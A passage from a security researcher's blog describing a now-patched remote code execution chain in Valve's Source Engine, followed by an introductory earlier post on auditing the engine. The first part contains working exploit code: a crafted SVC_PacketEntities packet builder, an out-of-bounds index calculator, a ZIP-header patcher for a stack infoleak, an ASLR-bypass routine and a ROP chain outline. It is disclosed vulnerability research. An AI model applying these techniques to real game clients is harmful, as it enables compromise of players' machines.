Now we have a candidate location to point our vtable pointer. We just have to point it at &tickcount - 24 and the engine will believe that tickcount is the function that should be called in the vtable. After a bit of testing, here’s the resulting script which creates and sends the SVC_PacketEntities packet to the client to trigger the exploit:

// craft the netmessage for the PacketEntities exploit
function SendExploit_PacketEntities(bf: bf_write, offset: number) {
    bf.WriteUBitLong(svc_PacketEntities, NETMSG_BITS)

    // Max entries
    bf.WriteUBitLong(0, 11)

    // Is Delta?
    bf.WriteBit(0)

    // Baseline?
    bf.WriteBit(0)

    // # of updated entries?
    bf.WriteUBitLong(1, 11)

    // Length of update packet?
    bf.WriteUBitLong(55, 20)

    // Update baseline?
    bf.WriteBit(0)

    // Data_in after here
    bf.WriteUBitLong(3, 2) // our data_in is of type 32-bit integer

    // >>>>>>>>>>>>>>>>>>>> The out of bounds type confusion is here <<<<<<<<<<<<<<<<<<<<
    bf.WriteUBitLong(offset, 32)

    // enterpvs flag
    bf.WriteBit(0)

    // zero for the rest of the packet
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
}

Now we’ve got the following modified chain:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable. We point this at &tickcount - 6*4 which we control.
  • The code offsets the vtable to index 6, dereferences, and calls the “function”, which will be the value we put in tickcount.

This generally looks like this in the exploit script:

// The fake object pointer and the ROP chain are stored in this cvar
ReplicateCVar(pkts_to_send, "sv_mumble_positionalaudio", tickCountAddress)

// Set a known location inside of engine.dll so we can use it to point our vtable value to
SetClientTick(pkts_to_send, new NativePointer(0x41414141))

// Then use exploit in PacketEntities to fake the object pointer to point to sv_mumble_positionalaudio's string value
SendExploit_PacketEntities(pkts_to_send, 0x26DA) 

0x26DA is the entnum value derived from the offsets above: it causes the out-of-bounds index and lands the returned pointer on sv_mumble_positionalaudio->m_pszString.
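
For illustration, here is roughly how that entnum falls out of the math, written as a hypothetical helper (the 0x28 array offset comes from the disassembly above and, like the addresses, is specific to this build):

// Compute the entnum that makes ecx+eax*8+0x28 land on a chosen address.
function calcEntnum(target: NativePointer, entitylist: NativePointer): number {
    const delta = target.sub(entitylist.add(0x28)).toInt32();
    if (delta % 8 !== 0) {
        throw new Error("target unreachable: not 8-byte aligned relative to the array");
    }
    // The result may be negative or huge: the index is allowed to under/overflow.
    return delta / 8;
}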

Finally, we can see the results of our efforts:

[Screenshot: debugger breaking with 0x41414141 popped into the instruction pointer at the ret]

As we can see here, 0x41414141 is being popped off the stack at the ret, giving us a one-shot arbitrary execute! What you can’t see here is that, further down on the stack, our entire packet is sitting there unchanged, giving us ample room for a ROP chain.

Now, all we need is a pivot, which can be easily found using the Ropper project. After finding an appropriate pivot, we can now begin crafting a ROP chain… except we are missing something important. We don’t know where any gadgets are located in memory, including our stack pivot! Up until now, everything we’ve done is with relative offsets, but now we don’t even know where to point the value of 0x41414141 to on the client, because the layout of the code is randomized by ASLR. The easy way out would be to load up CS:GO and use xinput.dll addresses for our ROP chain… but that would violate my arbitrary constraint that this exploit must work for all Source games.

This means we need to go infoleak hunting.

Leaking uninitialized stack memory using a tricky ZIP file bug

After auditing the engine for many days over the course of a few months, I was finally able to engineer a series of tricks to chain together to cause the engine to leak uninitialized stack memory. This was all-in-all significantly harder than the memory corruption, and required a lot of out-of-the-box thinking to get it to work. This was my favorite part of the exploit. Here’s some background on how some of these systems work inside the engine and how they can be chained together:

  • Servers can cause the client to upload arbitrary files with certain file extensions
  • Map files can contain an embedded ZIP file which can package additional textures/files. This is called a “pakfile”.
  • When the map has a pakfile, the engine adds the zip file as sort of a “virtual overlay” on the regular filesystem the game uses to read/write files. This means that, in any file accesses the game makes, it will check the map’s pakfile to see if it can read it from there.

The interesting behavior I discovered about this system is that, if the server requests a file that is inside of the map’s pakfile, the client will upload that file from the embedded ZIP to the server. This wouldn’t make any sense in a normal case, but what it does is create a very unintended attack surface.

Now, let’s take a look at the function which is responsible for determining how large the file is that is going to be uploaded to the server, and if it is too large to be sent:

int totalBytes = g_pFileSystem->Size( filename, pPathID );

if ( totalBytes >= (net_maxfilesize.GetInt()*1024*1024) )
{
    ConMsg( "CreateFragmentsFromFile: '%s' size exceeds net_maxfilesize limit (%i MB).\n", filename, net_maxfilesize.GetInt() );
    return false;
}

So, what happens inside of g_pFileSystem->Size when you point it to a file inside the pakfile? Well, the code reads the ZIP file structure and locates the file, then reads the size directly from the ZIP header:

[Screenshot: pakfile lookup code reading the file size straight from the ZIP header]

Notice: lookup.m_nLength = zipFileHeader.uncompressedSize

Now we fully control the contents of the map file we gave to the client when they loaded in. Therefore, we control all the contents of the embedded pakfile inside the map. This means we control the full 32-bit value returned by g_pFileSystem->Size( filename, pPathID );.

So, maybe you have noticed where we’re going. int totalBytes is a signed integer, and the comparison for whether a file is too large is determined by a signed comparison. What happens when totalBytes is negative? That makes it fully pass the length check.
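
Concretely (values are made up for the example), the signed comparison behaves like this:

// uncompressedSize from the hacked ZIP header, reinterpreted as a signed 32-bit int
const totalBytes = (0xFFFFFFF0 | 0);  // -16
const limit = 64 * 1024 * 1024;       // e.g. a net_maxfilesize of 64 MB
console.log(totalBytes >= limit);     // false -> the "size exceeds" error branch is skipped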

If we are able to hack a file into the ZIP structure with a negative length, the engine will now happily upload it to the server.

Let’s look at the function responsible for reading the file to be uploaded to the server.

Inside of CNetChan::SendSubChannelData:

// Seek to the next chunk of the (supposedly enormous) file inside the pakfile
g_pFileSystem->Seek( data->file, offset, FILESYSTEM_SEEK_HEAD );

// tmpbuf is a 0x100-byte stack buffer; the return value of Read() is ignored
g_pFileSystem->Read( tmpbuf, length, data->file );

// Whatever is in tmpbuf (initialized or not) is written into the outgoing packet
buf.WriteBytes( tmpbuf, length );

A stack buffer of size 0x100 is used to read the contents of the file in 0x100-sized chunks as the file is sent to the server. It does so by calling g_pFileSystem->Read() on the file pointer and reading out the data to a temporary buffer on the stack. The subchannel believes this file to be very large (it interprets the size as an unsigned integer), so the networking code will indefinitely send chunks to the server by allocating 0x100 bytes of stack space and calling ->Read(). But, when the file pointer reaches the end of the pakfile, the calls to ->Read() stop writing out any data to the stack as there is no data left to read. Rather than failing out of this function, the return value of ->Read() is ignored and the data is sent anyway. Because the stack’s contents are not cleared with each iteration, 0x100 bytes of uninitialized stack data are sent to the server over and over. The client’s subchannel will continue to send fragments indefinitely, as the “file size” is too large to ever be sent successfully.

After quite a bit of learning about how the PKZIP file structure works, I was able to write up this Python script which can take an existing BSP and hack in a negatively sized file into the pakfile. Here’s the result:

[Screenshot: output of the Python script patching a negatively sized file into the map’s pakfile]
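
The real tool is a Python script (linked at the end of this post), but the core of the patch is small. Here is a rough TypeScript sketch of the same idea, with header offsets taken from the PKZIP spec (the 0xFFFFFFF0 size and the brute-force header scan are illustrative):

import { readFileSync, writeFileSync } from "fs";

// Rewrite the 32-bit uncompressedSize fields for fileName inside a ZIP/pakfile.
function patchUncompressedSize(zipPath: string, fileName: string): void {
    const buf = readFileSync(zipPath);
    const name = Buffer.from(fileName, "ascii");
    for (let i = 0; i + 4 <= buf.length; i++) {
        const sig = buf.readUInt32LE(i);
        if (sig === 0x04034b50 && buf.indexOf(name, i + 30) === i + 30) {
            // Local file header: filename at +30, uncompressedSize at +22
            buf.writeUInt32LE(0xfffffff0, i + 22);
        } else if (sig === 0x02014b50 && buf.indexOf(name, i + 46) === i + 46) {
            // Central directory header: filename at +46, uncompressedSize at +24
            buf.writeUInt32LE(0xfffffff0, i + 24);
        }
    }
    writeFileSync(zipPath, buf);
}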

Now, we can test it by loading up Frida and crafting a packet to request the hacked file be uploaded to the server from the pakfile. Then, we can enable net_showfragments 1 in the game’s console to see all of the fragments that are being sent to us:

[Screenshot: net_showfragments 1 console output showing a stream of file fragments]

This shows us that the client is sending many file fragments (num = 1 means file fragment). When left running, it will not stop re-leaking that stack memory to us, and will just continue to do so infinitely as long as the client is connected. This happens slowly over time, so the client’s game is unaffected.

I also placed a Frida Interceptor hook on the function responsible for reading the file’s size, and here we can see that it is indeed returning a negative number:

[Screenshot: Frida Interceptor hook showing the file size function returning a negative number]

Lastly, I hooked the function responsible for processing incoming file fragment packets on the server, and lo and behold, I have this blob of data being sent to us:

           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  50 4b 05 06 00 00 00 00 06 00 06 00 f0 01 00 00  PK..............
00000010  86 62 00 00 20 00 58 5a 50 31 20 30 00 00 00 00  .b.. .XZP1 0....
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000030  00 00 00 00 00 00 fa 58 13 00 00 58 13 00 00 26  .......X...X...&
00000040  00 00 00 00 00 00 00 00 00 00 00 00 00 19 3b 00  ..............;.
00000050  00 6d 61 74 65 72 69 61 f0 5e 65 62 30 2e b9 05  .materia.^eb0...
00000060  60 55 65 62 9c 76 71 00 ce 92 61 62 f0 5e 65 62  `Ueb.vq...ab.^eb
00000070  08 0b b9 05 b8 00 7c 6d 30 2e b9 05 b9 00 7c 6d  ......|m0.....|m
00000080  f0 5e 65 62 f0 5e 65 62 f0 89 61 62 f0 5e 65 62  .^eb.^eb..ab.^eb
00000090  44 00 00 00 60 55 65 62 60 55 65 62 00 00 00 00  D...`Ueb`Ueb....
000000a0  00 b5 4e 00 00 6d 61 74 65 72 69 61 6c 73 2f 6d  ..N..materials/m
000000b0  61 70 73 2f 63 70 5f 63 ec 76 71 00 00 02 00 00  aps/cp_c.vq.....
000000c0  0a a4 bc 7b 30 2e b9 05 f0 70 88 68 40 00 00 00  ...{0....p.h@...
000000d0  00 a5 db 09 01 00 00 00 c4 dc 75 00 16 00 00 00  ..........u.....
000000e0  00 00 00 00 98 77 71 00 00 00 00 00 00 00 00 00  .....wq.........
000000f0  30 77 71 00 cb 27 b3 7b 00 03 00 00 97 27 b3 7b  0wq..'.{.....'.{

You might not be able to tell, but this data is uninitialized. Specifically, there are pointer values that begin with 0x7B or 0x7C littered in here:

  • 97 27 b3 7b
  • 0a a4 bc 7b
  • 05 b9 00 7c
  • 05 b8 00 7c

The offsets of these pointer values in the 0x100 byte buffer are not always at the same place. Some heuristics definitely go a long way here. A simple mapping of DWORD values inside the buffer over time can show that some values quickly look like pointers and some do not. After a bit of tinkering with this leak, I was able to get it controlled to leak a known pointer value with ~100% certainty.
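
As a sketch of the kind of heuristic I mean (the 0x70000000-0x80000000 window is illustrative, chosen from the 0x7B/0x7C-prefixed values above):

// Scan a leaked 0x100-byte fragment for dwords that look like code pointers.
function findCandidatePointers(frag: ArrayBuffer): number[] {
    const view = new DataView(frag);
    const candidates: number[] = [];
    for (let off = 0; off + 4 <= view.byteLength; off += 4) {
        const val = view.getUint32(off, true); // little-endian dword
        if (val >= 0x70000000 && val < 0x80000000) {
            candidates.push(val);
        }
    }
    return candidates;
}

Tracking which buffer offsets repeatedly produce values in that window across many fragments quickly separates stable return addresses from noise.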

Here’s what the final output of the exploit looked like against a typical user:

[*] Intercepting ReadBytes (frag = 0)
0x0: 0x14b5041
0x4: 0x14001402
0x8: 0x0
0xc: 0x0
0x10: 0xd99e8b00
0x14: 0xffff00d3
0x18: 0xffff00ff
0x1c: 0x8ff
0x20: 0x0
0x24: 0x0
0x28: 0x18000
0x2c: 0x74000000
0x30: 0x2e747365
0x34: 0x50747874
0x38: 0x6054b
0x3c: 0x1000000
0x40: 0x36000100
0x44: 0x27000000
[...]
0xcc: 0xafdd68
0xd0: 0xa097d0c
0xd4: 0xa097d00
0xd8: 0xab780c
0xdc: 0x4
0xe0: 0xab7778
0xe4: 0x7ac9ab8d
0xe8: 0x0
0xec: 0x80
0xf0: 0xab7804
0xf4: 0xafdd68
0xf8: 0xab77d4
0xfc: 0x0
[*] leakedPointer: 0x7ac9ab8d
[*] Engine_Leak2 offset: 0x23ab8d
[*] leakedBase: 0x7aa60000

Only one of these values had a lower WORD offset that made sense (the one at 0xE4), so it was easily selectable from the list of DWORDs. After leaking this pointer, I traced it back in IDA to a return address for the upper stack frame of this function, which makes total sense. I gave it the label Engine_Leak2 in IDA, which could be loaded directly from my ret-sync connection to dynamically calculate the proper base address of the engine.dll module:

// calculate the engine base based on the RE'd address we know from the leak
static convertLeakToEngineBase(leakedPointer: NativePointer) {
    console.log("[*] leakedPointer: " + leakedPointer)

    // get the known offset of the leaked pointer in our engine.dll
    let knownOffset = se.util.require_offset("Engine_Leak2");
    console.log("[*] Engine_Leak2 offset: " + knownOffset)

    // use the offset to find the base of the client's engine.dll
    let leakedBase = leakedPointer.sub(knownOffset);
    console.log("[*] leakedBase: " + leakedBase)

    if ((leakedBase.toInt32() & 0xFFFF) !== 0) {
        console.log("[!] Failed leak...")
        return null;
    }

    console.log("[*] Got it!")
    return leakedBase;
}

The Final Chain + RCE!

After successfully developing the infoleak, we now have both a pointer leak and an arbitrary execute bug. These two are sufficient for us to craft a ROP chain and pop that sweet sweet calculator. The nice part about Frida being a Python module at its core is that you can use pyinstaller to turn any Frida script into an all-in-one executable. That way, all you have to do is copy the .exe onto a server, run your Source dedicated server, and launch the .exe to arm the server for exploitation.

Anyway, here is the full step-by-step detail of chaining the two bugs together:

  1. Player joins the exploitation server. This is picked up by the PoC script and it begins to exploit the client.

  2. Player downloads the map file from the server. The map file is specially prepared to install test.txt into the GAME filesystem path with the compromised length

  3. The server executes RequestFile to request the test.txt file from the pakfile. The client builds fragments for the new file and begins sending 0x100 sized fragments to the server, leaking stack contents. Inside the stack contents is a leaked stack frame return address from a previous call to bf_read::ReadBytes. By doing some calculations on the server, this achieves a full ASLR protection bypass on the client.

  4. The malicious server calculates the base of engine.dll on the client instance using the leaked pointer. This allows the server to now build a pointer value in the exploit payload to anywhere within engine.dll. Without this infoleak bug, the payload could not be built because the attacker does not know the location of any module due to ASLR.

  5. The server script builds a fake object on the target client instance by replicating a ConVar onto the client: the replicated string holds the fake vtable pointer, placing it at a known location (the global ConVar). The PoC replicates onto sv_mumble_positionalaudio, which is a replicated ConVar inside of client.dll. The location of the contents of this replicated ConVar can be calculated from sv_mumble_positionalaudio->m_pszString and is used in later exploitation steps.

  6. The server builds a ROP chain payload to execute the Windows API call for ShellExecuteA. This ROP chain is used to bypass the NX protection on modern Windows systems. The chain utilizes the known addresses in engine.dll that were leaked from the exploitation of the separate bug in Step 3. Upon successful exploitation, this ROP chain can execute arbitrary code.

  7. The script again replicates the ConVar sv_downloadurl onto the client instance with the value of C:/Windows/System32/winver.exe. This is used by the ROP chain as the target program to execute with ShellExecuteA. This ConVar exists inside of engine.dll, so the pointer sv_downloadurl->m_pszString is now at an attacker-known location.

  8. The server sends a crafted NET_Tick message to modify the value of g_ClientGlobalVariables->tickcount to be a pointer to a stack pivot gadget found inside of engine.dll (again, leaked from Step 3). Essentially, this is another trick to get a pointer value to exist at an attacker controlled location within engine.dll.

  9. Now the second bug comes into play. The server sends a specially crafted SVC_PacketEntities netmessage, which will call CL_CopyExistingEntity on the client instance with the vulnerable value for m_nNewEntity. This value exploits the array overrun in GetClientNetworkable inside of client.dll and confuses the pointer return value to instead be a pointer to sv_mumble_positionalaudio->m_pszString (also inside client.dll). At the location of sv_mumble_positionalaudio->m_pszString is the fake object pointer created in Step 5. This object pointer redirects execution by pretending to be an IClientNetworkable* object and forwards the virtual method call to the value found within g_ClientGlobalVariables->tickcount. This means we can set the instruction pointer to any value specified by the NET_Tick trick we used in Step 8.

  10. Lastly, to execute the ROP chain and achieve RCE, g_ClientGlobalVariables->tickcount is pointed at a stack pivot gadget inside of engine.dll. This pivots the stack to the ROP payload that was placed in sv_mumble_positionalaudio->m_pszString in Step 5. The ROP chain then begins execution. The chain loads the necessary arguments to call ShellExecuteA, then executes whatever program path we replicated onto sv_downloadurl in Step 7. In this case, it is used to execute winver.exe for proof of concept. This chain can execute any code of the attacker’s choosing, and has full permissions to access all of the user’s files and data.

And there you have it. This entire exploitation happens automatically, using Frida to inject into the dedicated server process and instrument it to perform all of the steps above. This is quite involved, but the result is pretty awesome! Here’s a video of the full PoC in action; be sure to full screen it so it’s easier to see:

[Video: full PoC demonstration]

Disclosure Timeline

  • [2020-05-13] Reported to Valve through HackerOne
  • [2020-05-18] Bug triaged
  • [2021-04-28] Notification that the bugs were fixed in Beta
  • [2021-04-30] Bounty paid ($7500) and notification that the bugs were fixed in Retail

Supporting Files

Exploit PoC and the map hacking Python script referenced in this post are available in full at:

https://github.com/Gbps/sourceengine-packetentities-rce-poc

For the Frida exploit chain: https://github.com/Gbps/sourceengine-packetentities-rce-poc/tree/master/src/agent

Be sure to give it a ⭐ if you liked it!

Final thoughts

This chain was super fun to develop, and the constraints I placed on myself made the exploit way more interesting than my first submission. I’m glad that the report finally went through so I could publish the information for everyone to read. It really goes to show that even a fairly simple set of bugs on paper can turn into a complex exploitation effort quickly when targeting big software applications. But, doing so helps you develop skills that you might not necessarily pick up from simple CTF problems.

Incorporating the Frida project definitely reinvigorated my drive to continue poking and testing PoCs for bugs, as the process for scripting up examples was much nicer than before. I hope to spend some time in a future post to discuss more ways to utilize Frida on the desktop, and also hope to publish my ret-sync Frida plugin in an official capacity on my GitHub soon.

I’m also working on some other projects in the meantime, off-and-on. One of them is a fairly large project which implements a CS:GO client from scratch in Rust, to help improve my skills with the language. After a ton of work, I can happily say my client can authenticate with Steam, fully connect and load into a server, send and receive netchannel packets with the game server, and host a fake console to execute concommands. There is no graphical portion of this; it is entirely command-line based.

In addition, I’ve started to shift my focus somewhat away from Source and onto Steam itself. Steam is a vastly complex application, and the networking protocol it uses is orders of magnitude more complex than Source’s. There hasn’t been much public research on Steam’s networking protocols, so I’ve written a few tools that can fully encode/decode this networking layer and intercept packets to learn how they work. Even an idle instance of Steam creates a lot of very interesting traffic that very few people have looked at! More information on this hopefully soon.

For now, I don’t have a timeline for the release of any of those projects, or for the next blog post I will write, but hopefully it won’t be as long as it took to get this one out ;)

Thank you for reading!

Exploiting the Source Engine (Part 1)

2 August 2018 at 00:00

Introduction

It’s been a long time coming, but here’s my first post on a series about finding and exploiting bugs in Valve Software’s Source Engine. I was first introduced to it through the sandbox game Garry’s Mod in 2010, which introduced me to the field of reverse engineering and paved the way for my favorite hobby, my education, and my eventual employment.

I took a long hiatus from working with the Source Engine when I went to college and became obsessed with playing CTF competitions, a type of competition where participants solve challenges that mimic real-world reverse engineering and exploitation tasks. One day, I saw a post made about a TF2 RCE proof-of-concept released against the engine. To be honest, the bug and the exploit were very simple, and nothing more difficult than some of the intermediate challenges one would find in a good CTF. With that knowledge under my belt, I decided to prove myself and come back to the Source Engine with the goal of finding a true Remote Code Execution (RCE).

As it turns out, this was around the time that Valve released their Bug Bounty program through HackerOne, where they boasted a bounty range of $1,000 - $25,000 for these kinds of bugs. With a bit of luck, I successfully found and wrote a proof-of-concept for a critical Server to Client RCE bug, and was given a generous bounty of $15,000 from Valve. Everything in this series is dedicated to information I’ve learned along the way about the engine.

NOTE: As of writing, the vulnerability has not been publicly disclosed. I will be doing a writeup of the bug and exploit chain if/when it goes public.

[Screenshot: Steam’s most-played games by current player count]
Source games Dota 2, CS:GO, and TF2 continue to hold top active player counts on Steam.

The Source Engine

The Source Engine is a third-generation derivative of the famous Quake engine from 1996 and Valve’s own GoldSrc engine (the HL1 engine). The engine itself has been used to create some of the most famous FPS game series in history, including Half-Life, Team Fortress, Portal, and Counter-Strike.

Timeline:

  • 1998 - Valve showcases GoldSrc, a heavily modified Quake engine.
  • 2004 - Valve releases the Source Engine based on GoldSrc.
  • 2007 - The source code to the Source Engine is leaked.
  • 2012 - CS:GO is released, and with it, “Source 1.5” begins development.
  • 2013 - Valve releases the public 2013 SDK for the TF2/CS:S engine containing most of the code necessary to write games for the engine.
  • 2015 - The “Reborn” update for Dota 2 brings the first Source 2 game to market.
  • 2018 - Valve opens their HackerOne program to the public.

The Code:

The first thing that I didn’t truly appreciate about this engine (and other engines in general) is how large it is. The engine is gigantic, featuring millions of lines of C++ code to develop, render, and run games of all types (but mostly first-person games).

The code itself is old and unmaintained. Most of the code was very obviously rushed out to meet deadlines, and honestly it is a huge surprise that the engine even functions at all. This is not unique to Valve, and is very typical in the game development world.

Assets such as models, particles, and maps are all built and run using custom file formats developed by Valve or extended from Quake (yes, file format parsers from the ’90s). There are still usages of obviously unsafe functions such as strcpy and sprintf, and in general the engine itself has a history of “add, add, add” and very little maintenance.

A lot of the C++ classes included in the engine are straight-up dead code. Big features were designed and developed, yet only used for very small parts of the engine. The 2013 SDK tools themselves still have difficulty building valid files for current versions of the engine. Classes derive from anywhere from one to nine or more different base classes, and tend to feature a never-ending maze of abstractions on abstractions. Navigating this codebase is time consuming and generally unpleasant for beginners. All in all, the engine is due for a legacy code rewrite that will likely never happen.

Intro to Source Games:

Source Engine games consist of two separate parts: the engine and the game.

The engine consists of all of the typical game engine features like rendering, networking, the asset loaders for models and materials, and the physics engine. When I refer to the Source Engine, I am referring to this part of the game. The bulk of the engine’s code is found in engine.dll, located at /bin/engine.dll from the game’s root. This same base code is used in some manner across all SE games, and is typically utilized by 3rd party game developers in its pre-compiled form. The code for the Source Engine was leaked (luckily) as part of the 2007 Valve leak, and this leak is all the code that is available to the public for the engine.

The second part, the game, consists of two main binaries: client.dll and server.dll. These binaries contain the compiled game that will use the engine, and both of them utilize engine.dll heavily in order to function. Inside of client.dll, you will find the code responsible for the GUI subsystem (named VGUI) of the game and the clientside logic of the actual game itself. Inside of server.dll, you will find all of the code to communicate the game’s serverside logic to the remote player’s client.dll. Both of these dlls are found in /[gamedir]/bin/*.dll, where [gamedir] is the game abbreviation (csgo, tf2, etc.).

Both the server and client have shared code that defines the entities of the game and variables that will be synchronized. Shared code is compiled directly into each binary, but some C macro design ensures that only the server parts compile to server.dll, and vice-versa. The engine.dll entity system will synchronize the server’s simulation of the game, and the client’s dll will take these simulations and display them to the player through the engine.dll renderer.

Lastly, a big feature of all Source games that was taken and evolved from the Quake engine is the ConVar system. This system defines a series of variables and commands that are executed on an internal command line, very similar to a cmd.exe or /bin/sh shell. The difference is that, instead of executing new processes, these commands will run functions on either the client or server depending on where its run. The engine defines some low-level ConVars found on both the server and client, while the game dlls add more on top of that depending on the game dll that’s running.

  • A Console Variable (ConVar) takes the form of <name> <value>, where the value can be numerical or string based. Typically used for configuration, certain special ConVars will be synchronized. The server can always request the value of a client’s ConVar. Example: sv_cheats 1 sets the ConVar sv_cheats to 1, which enables cheats.
  • A Console Command (ConCommand) takes the form of <name> <arg0> <arg1> …, and defines a command with a backing C++ function that can be run from the developer console. Sometimes, it is used by the game or the engine to run remote functions (client -> server, server -> client). Example: changelevel de_dust executes the command changelevel with the argument de_dust, which changes the current map when run on the server console.

This is just an intro, more on all of this to follow in future posts.

The Bugs:

All of this old code and these custom formats are fantastic for a bug hunter. In 2018, all that’s truly necessary to perform a full chain RCE is a good memory corruption bug to take control and an information leak to bypass ASLR. Typically, the former is the most difficult part of bug hunting in modern software, but later you will see that, for the SE, it is actually the latter.

Here is an overview of the Windows binaries:

  • 32-bit binaries
  • NX - Enabled
  • Full ASLR - Enabled (recently)
  • Stack Cookies - Disabled (in the cases where it matters)

If you’re an exploit developer, you would probably find the lack of stack cookies in a game engine with millions of players to be a very shocking discovery. This is a critical shortcoming of the already aging engine, and is essentially unheard of in modern Windows binaries. Valve is well aware of this protection’s existence, and has chosen time and time again not to enable it. I have some speculation as to why (most likely performance or build-breaking issues), but regardless, there is a huge point to make: any controllable stack overflow can overwrite the instruction pointer and divert code execution.

Considering how much the stack is used in this engine, this is a huge benefit to bug hunters. One simple out-of-bounds (OOB) string copy, such as a call to strcpy, will result in swift compromise of the instruction pointer straight into RCE. My first bug, unsurprisingly, is a stack overflow bug, not much different than you would find in a beginner-level CTF challenge. But, unlike the CTF, its implications (a full client machine compromise in a series of games with a huge player base) lead to the large payout.

Hunting:

When hunting for these bugs, I chose to take a slightly more difficult path of only performing manual code auditing on the publicly available engine code. What this allows me to do is both search for potentially useful bugs and also learn the engine’s internals along the way. While it might be enticing for me to just fuzz a file format and get lots of crashes, fuzzing tends to find surface level bugs that everyone’s finding, and never those really deep, interesting bugs that no one is finding.

As I said previously, the codebase for this engine is gigantic. You should take advantage of all of the tools available to you when searching. My preferred toolset is this:

  • Following code structure and searches using Visual Studio with Resharper++.
  • Cmder (with grep) to search for patterns.
  • IDA Pro to prove the existence of the bug in the newest build.
  • WinDbg and x64dbg to attach to the game and try to trigger the bug.
  • Sourcemod extensions to modify the server for proof-of-concepts

With these tools, my general “process” for bug hunting is this:

  1. Find some section of the client code I feel is exploitable and want to look into more closely

  2. Start reading code. I’ll read for hours until I come across what I think is a possible exploitable bug.

  3. From there, I will open up IDA Pro and locate the function I think is exploitable, then compare its current code with the old, public code I have available.

  4. If it still appears to be exploitable, I will try to find some method to trigger the exploitable function from in-game. This turns out to be one of the hardest parts of the process, because finding a triggerable path to that function is a very difficult task given the size of the engine. Sometimes, the server just can’t trigger the bug remotely. Some familiarity with the engine goes a long way here.

  5. Lastly, I will write Sourcemod plugins that will help me trigger it from a game server to the client, hoping to finally prove the existence of the bug and the exploitability in a proof-of-concept.

Next Time

Next post, I will go more in-depth into the codebase of the Engine and explain the entity and networking system that the Engine utilizes to run the game itself. Also, I will begin introducing some of the techniques I used to write the exploits, including the ASLR and NX bypass. There’s a whole lot more to talk about, and this post barely scratches the surface. At the moment, I’m in the process of working on a new undisclosed bug in the engine. Hoping to turn this one into another big payout. Wish me luck!

— Gbps
